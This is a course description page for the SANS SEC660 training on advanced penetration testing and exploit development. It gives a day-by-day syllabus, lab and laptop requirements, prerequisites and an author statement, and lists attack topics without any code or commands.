SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking

SEC660 is an excellent course for professionals seeking a strong technical introduction to exploit development.

Jenn Allen, Twinstate

SEC660 has the most comprehensive coverage of fuzzing--I would have signed up for the course for that alone.

Adam Kliarsky, Cedars-Sinai Medical Center

SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking is designed as a logical progression point for those who have completed SANS SEC560: Network Penetration Testing and Ethical Hacking, or for those with existing penetration testing experience. Students with the prerequisite knowledge to take this course will walk through dozens of real-world attacks used by the most seasoned penetration testers. The methodology of a given attack is discussed, followed by exercises in a real-world lab environment to solidify advanced concepts and allow for the immediate application of techniques in the workplace. Each day includes a two-hour evening bootcamp to allow for additional mastery of the techniques dis- cussed and even more hands-on exercises. A sample of topics covered include weaponizing Python for penetration testers, attacks against network access control (NAC) and VLAN manipulation, network device exploitation, breaking out of Linux and Windows restricted environments, IPv6, Linux privilege escalation and exploit-writing, testing cryptographic implementations, fuzzing, defeating modern OS controls such as ASLR and DEP, Return Oriented Programming (ROP), Windows exploit-writing, and much more!

It is well-known that attackers are becoming cleverer and their attacks more complex. In order to keep up with the latest attack methods, one must have a strong desire to learn, the support of others, and the opportunity to practice and build experience. SANS SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking engages attendees with in-depth knowledge of the most prominent and powerful attack vectors and an environment to perform these attacks in numerous hands-on scenarios. This course goes far beyond simple scanning for low-hanging fruit, and shows penetration testers how to model the abilities of an advanced attacker to find significant flaws in a target environment and demonstrate the business risk associated with these flaws.

SEC660 starts off by introducing advanced penetration concepts, and an overview to help prepare students for what lies ahead. The focus of day one is on network attacks, an area often left untouched by testers. Topics include accessing, manipulating, and exploiting the network. Attacks are performed against NAC, VLANs, OSPF, 802.1X, CDP, IPv6,VOIP, SSL, ARP, SNMP, and others. Day two starts off with a technical module on performing penetration testing against various cryptographic implementations. The rest of the day is spent on network booting attacks, escaping Linux restricted environments such as chroot, and escaping Windows restricted desktop environments. Day three jumps into an introduction of Python for penetration testing, Scapy for packet crafting, product security testing, network and application fuzzing, and code coverage techniques. Days four and five are spent exploiting programs on the Linux and Windows operating systems. You will learn to identify privileged programs, redirect the execution of code, reverse-engineer programs to locate vulnerable code, obtain code execution for administrative shell access, and defeat modern operating system controls such as ASLR, canaries, and DEP using Return Oriented Program- ming (ROP) and other techniques. Local and remote exploits, as well as client-side exploitation techniques are covered. The final course day is dedicated to numerous penetration testing challenges requiring you to solve complex problems and capture flags.

It is well-known that attackers are becoming cleverer and their attacks more complex. In order to keep up with the latest attack methods, one must have a strong desire to learn, the support of others, and the opportunity to practice and build experience. SANS SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking engages attendees with in-depth knowledge of the most prominent and powerful attack vectors and an environment to perform these attacks in numerous hands-on scenarios. This course goes far beyond simple scanning for low-hanging fruit, and shows penetration testers how to model the abilities of an advanced attacker to find significant flaws in a target environment and demonstrate the business risk associated with these flaws.

SANS SEC660 Advanced Penetration Testing, Exploits, and Ethical Hacking starts off by introducing advanced penetration concepts, and an overview to help prepare students for what lies ahead. The focus of day one is on network attacks, an area often left untouched by testers. Topics include accessing, manipulating, and exploiting the network. Attacks are performed against NAC, VLANs, OSPF, 802.1X, CDP, IPv6, VOIP, SSL, ARP, SNMP, and others. Day two starts off with a technical module on performing penetration testing against various cryptographic implementations. The rest of the day is spent on network booting attacks, escaping Linux restricted environments such as chroot, and escaping Windows restricted desktop environments. Day three jumps into an introduction of Python for penetration testing, Scapy for packet crafting, product security testing, network and application fuzzing, and code coverage techniques. Days four and five are spent exploiting programs on the Linux and Windows operating systems. You will learn to identify privileged programs, redirect the execution of code, reverse-engineering programs to locate vulnerable code, obtain code execution for administrative shell access, and defeat modern operating system controls such as ASLR, canaries, and DEP using Return Oriented Programming (ROP) and other techniques. Local and remote exploits, as well as client-side exploitation techniques are covered. The final course day is dedicated to numerous penetration testing challenges requiring you to solve complex problems and capture flags.

Course Syllabus

SEC660.1: Network Attacks for Penetration Testers

Overview

Day one serves as an advanced network attack module, building on knowledge gained from SEC560: Network Penetration Testing and Ethical Hacking. The focus for day two will be on obtaining access to the network; manipulating the network to gain an attack position for eavesdropping and attacks, and for exploiting network devices; leveraging weaknesses in network infrastructure; and taking advantage of client frailty.

The first part of day two focuses on exploiting and bypassing network access control (NAC) as well as techniques for exploiting common weaknesses in IEEE 802.1X authentication and the Extensible Authentication Protocol (EAP). We also examine multiple techniques for VLAN manipulation and VLAN hopping attacks with multiple lab exercises to reinforce these topics. This section is concluded with IPv6 for penetration testers!

We continue by examining techniques for manipulating networks, taking advantage of man-in-the-middle attack opportunities against multiple protocols including (e.g., ARP, HSRP, VRRP) and internal routing protocols, including OSPF. We also discuss custom network protocol manipulation and demonstrate how to modify the behavior of common protocols to an attacker's advantage using various tools and lab exercises.

Once we've examined techniques to gain access to and manipulate the network, we look at network exploit techniques. We examine practical attacks against common network protocols, such as SNMP, with a focus on Cisco SNMP attacks as well as attacks against client systems and software updates. We also look at techniques to bypass strong security controls achieved through encryption technologies, such as SSL.

Overview

Day two starts by taking a tactical look at techniques penetration testers can use to investigate and exploit common cryptography mistakes. We begin by building some fundamental knowledge on how ciphers operate without getting bogged down in complex mathematics, and then we move on to techniques for identifying, assessing, and attacking real-world crypto implementations. We finish the module with lab exercises that allow you to practice your newfound crypto attack skill set against reproduced real-world application vulnerabilities.

The day continues with advanced techniques but focuses more on attacking hosts by abusing environment features. We manipulate pre-booting environments to deliver bootable payloads to the host. The booting exercise demonstrates stealing drive contents remotely.

We continue leveraging situational context to escape restricted environments. First we will build up knowledge of local restrictions on hosts. Once we establish a set of possible restrictions, we leverage that knowledge to circumvent them. We will escape a typical situation: a Linux chroot environment isolating a vulnerable application from the rest of the host. Using these skills, we get a better foothold to continue our attack from.

Then we take on restricted desktops in Windows. We will cover the core components that restrict the desktop and a variety of escape possibilities. The Windows escape exercise is a perfect, real-world demonstration of the risks of relying on obfuscation and blacklisting to thwart attacks.

The day ends with a challenging boot camp exercise against a full network environment comprised of a variety of modern, representative, and fully patched systems with no weak passwords to be found anywhere.

CPE/CMU Credits: 8

SEC660.3: Python, Scapy, and Fuzzing

Overview

Day three brings together multiple skill sets needed for creative analysis in penetration testing. We start with discussing product security testing. The day continues with a focus on how to leverage Python as a penetration tester. It is designed to help people unfamiliar with Python start modifying scripts to add their own functionality while helping seasoned Python scripters improve their skills. Once we leverage the Python skills in creative lab exercises, we move on to leveraging Scapy for custom network targeting and protocol manipulation. Using Scapy, we examine techniques for transmitting and receiving network traffic beyond what canned tools can accomplish, including IPv6.

We continue by discussing the techniques and the philosophy used for penetration testing against products, proprietary applications, and commercial products are also discussed. The focus throughout the course is centered on how advanced penetration testing techniques and exploitation can be used to perform comprehensive assessments that go far beyond typical penetration tests. Next, we take a look at network protocol and file format fuzzing. We leverage fuzzing to target both common network protocols and popular file formats for bug discovery. In class we develop custom protocol fuzzing grammars to discover bugs in popular software with hands-on lab exercises. Finally, we carefully discuss the concept of code coverage and how it ties hand-and-hand with fuzzing. A lab is performed using the Paimei Reverse Engineering Framework and IDA Pro to demonstrate the techniques discussed.

CPE/CMU Credits: 8

Topics

Becoming familiar with Python types

Leveraging Python modules for real-world pen tester tasks

Manipulating stateful protocols with Scapy

Using Scapy to create a custom wireless data leakage tool

Product security testing

Using Taof for quick protocol mutation fuzzing

Optimizing your fuzzing time with smart target selection

Automating target monitoring while fuzzing with Sulley

Leveraging Microsoft Word macros for fuzzing .docx files

Block-based code coverage techniques using Paimei

SEC660.4: Exploiting Linux for Penetration Testers

Overview

Day Four begins by walking through memory from an exploitation perspective as well as introducing x86 assembler and linking and loading. These topics are important to understand for anyone performing penetration testing at an advanced level. Processor registers are directly manipulated by testers and must be intimately understood. Disassembly is a critical piece of testing and will be used throughout the remainder of the course. We will take a look at the Linux OS from an exploitation perspective and discuss the topic of privilege escalation. We continue by describing how to look for SUID programs and other likely points of vulnerabilities and misconfigurations. The material will focus on techniques that are critical to performing penetration testing on Linux applications.

The next section goes heavily into stack overflows on Linux to gain privilege escalation and code execution. We'll first cover using a debugger to expose weak passwords. Then we'll go over redirection of program execution and, finally, code execution. Techniques such as return to buffer and return to C library will be covered, as well as an introduction to Return Oriented Programming (ROP). The remainder of the day takes students through techniques used to defeat or bypass system OS protections such as stack canaries and address space layout randomization (ASLR). The goal of this section is to expose students to common obstacles on modern Linux-based systems.

CPE/CMU Credits: 8

Topics

Stack and dynamic memory management and allocation on the Linux OS

Disassembling a binary and analyzing x86 assembly code

Performing symbol resolution on the Linux OS

Identifying vulnerable programs

Code execution redirection and memory leaks

Identifying and analyzing stack-based overflows on the Linux OS

Performing return-to-libc (ret2libc) attacks on the stack

Return Oriented Programming (ROP)

Defeating stack protection on the Linux OS

Defeating ASLR on the Linux OS

SEC660.5: Exploiting Windows for Penetration Testers

Overview

On day five we start off with covering the OS security features (ALSR, DEP, etc.) added to the Windows OS over the years as well as Windows specific constructs, such as the process environment block (PEB), structured exception handling (SEH), thread information block (TIB), and the Windows API. Differences between Linux and Windows will be covered. These topics are critical in assessing Windows-based applications. We then focus on stack-based attacks against programs running on the Windows OS. We look at fuzzing skills, which are required to test remote services such as TFTP and FTP for faults. Once a fault is discovered, the student will work with Immunity Debugger to turn the fault into an opportunity for code execution and privilege escalation. The student will learn how to take a discovered exploit and port it over as a Metasploit module. Advanced stack-based attacks, such as disabling data execution prevention (DEP) and heap spraying for browser-based applications, are covered. Client-side exploitation will be introduced, as it is a highly common area of attack. A continuation on Return-Oriented Programming (ROP) is performed demonstrating the technique against a vulnerable application, while looking at defeating hardware DEP and ASLR on Windows. Next, a module on porting over an exploit into the Metasploit Framework is covered, and how to quickly identify bad characters in your shellcode and as input into a program. An introduction to Windows Heap overflows rounds out the end of the day. Finally, we'll take a quick look at shellcode and the differences between shellcode on Linux and Windows.

CPE/CMU Credits: 8

Topics

The state of Windows OS protections on XP, Vista, 7, Server 2003 and 2008

Understanding common Windows constructs

Stack exploitation on Windows

Defeating OS protections added to Windows

Dynamic and static fuzzing on Windows applications or processes

Creating a Metasploit Module

Advanced stack-smashing on Windows

Return Oriented Programming (ROP)

Windows 7 and Windows 8

Porting Metasploit Modules

Client-side exploitation

Windows and Linux shellcode

SEC660.6: Capture the Flag

Overview

This day will serve as a real-world challenge for students, requiring them to utilize skills obtained throughout the course, think outside the box, and solve simple to complex problems. A web server scoring system and CTF engine will be provided to score students as they capture flags. More difficult challenges will be worth more points. In this offensive exercise, challenges range from local privilege escalation to remote exploitation on both Linux and Windows systems as well as networking attacks and other challenges related to the course material.

CPE/CMU Credits: 6

Additional Information

Laptop Required

You will use VMware to run multiple operating systems when performing class exercises. Linux VM's with all necessary tools will be provided on a DVD on the first day.

You must bring your own Virtual Machine image of Windows XP SP2 or XP SP3. This must be a base install with no updates applied. Windows 7 is also recommended, but not required.

Tools needed for Windows will be issued in class. Ensure that you have the administrative ability to disable all security software and protection, including antivirus and personal firewalls. You will not be able to complete the exercises without this level of control. Also ensure that you can install software that may be blocked by administrative or security controls due to their nature. You will be installing various debuggers and vulnerable applications onto the VM's.

You must have VMware Workstation installed on your system prior to class beginning. You need to use at least VMware Workstation Version 6 to support the VM's that will be distributed in class. If you do not own a licensed copy of VMware, you can download a free 30-day trial copy from www.vmware.com. VMware will send you a time-limited serial number if you register for the trial at their Web site. You may also use VMware Player; however, there are limitations such as the inability to take snapshots. If you choose to use VMware player, you must use at least version 2.5.1.

Attention Mac Users: VMware Fusion will work with the majority of the exercises for SEC660 on Mac OSX; however, there is the potential for some serious issues with networking over bridged connections. You may experience some of these issues which could inhibit your ability to complete some of the labs. VirtualBox, version 4.2.4 or later, is recommended as the optimal way to complete the exercises on Mac OSX with the SANS SEC660 course. You must be running OS X 10.6 "Snow Leopard" or newer. If you elect to stay with Fusion, please be prepared for the possibility of experiencing more difficulty in lab set up than using VMware Workstation on a PC. You will need to map function keys such as F7 and F9 through any virtualization application on OSX in order to perform debugging. It is strongly recommended that you bring a USB Ethernet LAN adapter since you will not have the ability to natively boot your Mac using BackTrack. Please verify that you are able to use the external adapter with your Mac while having Backtrack running in a virtual machine.

Verify that your processor architecture supports your VMware version. Do not wait until the day of class.

If you have additional questions about the laptop specifications, please contact laptop_prep@sans.org.

Who Should Attend

Network and Systems Penetration Testers - SEC660 gives penetration testers the training needed to perform advanced penetration testing against known or unknown applications, services, and network systems. SEC660 gives students the expertise to perform complex attacks and develop their own exploits for existing and new frameworks.

Incident Handlers - SEC660 gives incident handlers the knowledge needed to understand advanced threats. Often, a handler is tasked with determining the threat level associated with an attack. The ability to understand advanced attack techniques and analyze exploit code can help a handler identify, detect, respond to an incident.

Application Developers - SEC660 teaches developers the ramifications of poor coding. Often, a developer or code reviewer is required to clearly demonstrate the threat and impact of a coding error. SEC660 provides developers with the knowledge to create proof-of-concept exploit code and document their findings.

IDS Engineers - SEC660 teaches IDS professionals how to analyze exploit code and identify weaknesses. This knowledge can be used to write better IDS signatures and understand the impact of an alert.

Prerequisites

This is a fast-paced, advanced course that requires a strong desire to learn advanced penetration testing and custom exploitation techniques. SANS courses such as SEC504: Hacker Techniques, Exploits, and Incident Handling, SEC560: Network Penetration Testing and Ethical Hacking, and SEC610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques are recommended prior to or as a companion to taking this course. Experience with programming in any language is highly recommended. At a minimum, students are advised to read up on basic programming concepts. Python is the primary language used during class exercises, while programs written in C and C++ code are the primary languages being reversed and exploited. The basics of programming will not be covered in this course; however, there is an introductory module on Python. You should be well versed with the fundamentals of penetration testing prior to taking this course. Familiarity with Linux and Windows is mandatory. A solid understanding of TCP/IP and networking concepts is required. Please contact the author at stephen@deadlisting.com if you have any questions or concerns around pre-requisites.

Model the techniques used by attackers to perform 0-day vulnerability discovery and exploit development

Develop more accurate quantitative and qualitative risk assessments through validation

Demonstrate the needs and effects of leveraging modern exploit mitigation controls

Reverse engineer vulnerable code to write custom exploits

Great preparation for students planning on taking the following courses:

SEC710 Advanced Exploit Development

Author Statement

As a perpetual student of information security, I am excited to offer this course on advanced penetration testing. Often, when conducting an in-depth penetration test, we are faced with situations that require unique or complex solutions to successfully pull off an attack, mimicking the activities of increasingly sophisticated real-world attackers. Without the skills to do so, you may miss a major vulnerability or not properly assess its business impact. Target system personnel are relying on you to tell them whether or not an environment is secured. Attackers are almost always one step ahead and are relying on our nature to become complacent with controls we work so hard to deploy. This course was written to keep you from making mistakes others have made, teach you cutting edge tricks to thoroughly evaluate a target, and provide you with the skills to jump into exploit development. Contact me at stephen@deadlisting.com if you have any questions about the course!